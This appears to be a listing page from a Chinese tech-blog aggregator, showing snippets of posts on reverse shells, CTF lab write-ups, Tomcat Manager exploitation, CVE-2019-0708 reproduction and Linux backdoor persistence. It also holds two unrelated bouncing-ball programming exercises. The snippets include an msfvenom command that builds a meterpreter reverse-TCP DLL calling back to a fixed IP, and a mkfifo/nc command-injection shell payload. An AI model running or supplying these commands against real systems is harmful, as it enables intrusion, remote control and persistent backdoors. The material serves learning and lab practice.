某一次小练习 1.存活主机 根据提示我们可以查看 可以看到8080端口开放 浏览器访问 单纯图片 扫描目录 访问manager 2.利用msf爆破· 3.Tomcat Manager经过身份验证的上载代码执行 成功反弹到shell flag1 ...
分类:
其他好文 时间:
2020-02-16 22:18:44
阅读次数:
88
一、运行exe程序反弹shell 需要先生成exe木马,然后将exe文件上传到服务器上,最后在服务器上运行该文件。可使用msfvenom生成exe木马。 二、加载dll文件反弹shell 需要先生成dll文件,然后使用regsvr32.exe加载dll。可使用msfvenom生成dll文件。 三、P ...
第一步:生成dll文件 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.106.10 LPORT=443 -f dll -o /tmp/reverse_tcp.dll 第二步:启动MSF等待回连 use exploit/mu ...
分类:
系统相关 时间:
2020-02-16 16:13:17
阅读次数:
132
反弹shell备忘录 简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)://ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网v ...
分类:
系统相关 时间:
2020-02-13 17:29:58
阅读次数:
96
开门见山 ·Low ·Medium ·High · 命令执行监听端口 ;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe nc 192.168.31.100 4444 · 反弹shell 拷贝shell文件 启动kali的apache服 ...
分类:
其他好文 时间:
2020-02-06 16:14:05
阅读次数:
88
powercat 也是一套基于 DNS 通信协议的工具。Powercat的dns的通信是基于dnscat设计的(其服务端就是dnscat)。在使用dnscat时需要进行下载和编译。 dnscat服务端安装: #git clone https://github.com/iagox86/dnscat2. ...
分类:
其他好文 时间:
2020-02-02 11:42:35
阅读次数:
91
在CVE-2019-0708公布后几天就已经尝试过复现该漏洞,但借助当时exp并没能成功复现反弹shell的过程遂放弃,故借助这次漏洞复现报告再来尝试复现该漏洞,因为还在大三学习中,有很多知识还没有掌握,出现的错误希望得到指正,也想借此给19年的学习画上句号,希望这次可以成功吧。 漏洞背景 CVE- ...
分类:
其他好文 时间:
2020-01-28 10:56:14
阅读次数:
75
Python 练习实例20 题目:一球从100米高度自由落下,每次落地家电维修后反跳回原高度的一半;再落下,求它在第10次落地时,共经过多少米?第10次反弹多高? 程序分析:无 程序源代码: 以上实例输出结果为: ...
分类:
编程语言 时间:
2020-01-11 13:28:06
阅读次数:
72
/* 一球从100米高度自由落下,每次落地后反跳回原高度的一半; 再落下,求它在第10次落地时,共经过多少米?第10次反弹多高? 解题思路: 第一次:反弹高度100/2=50,经过100+50*2=200米 第二次:反弹高度50/2=25,经过200+25*2=75米 循环10次,反弹高度h=h/2 ...
分类:
其他好文 时间:
2020-01-08 19:17:05
阅读次数:
82
[TOC] ssh软连接 添加用户 修改/etc/sudoers文件 suid后门 crontab反弹shell后门 ssh免密登录 ssh wrapper后门 inetd strace后门 协议后门 icmp 使用情况:主机从内到外的服务也被仅用了很多,但是icmp没有被禁用(一般很少禁用ping ...
分类:
系统相关 时间:
2019-12-26 00:09:17
阅读次数:
163
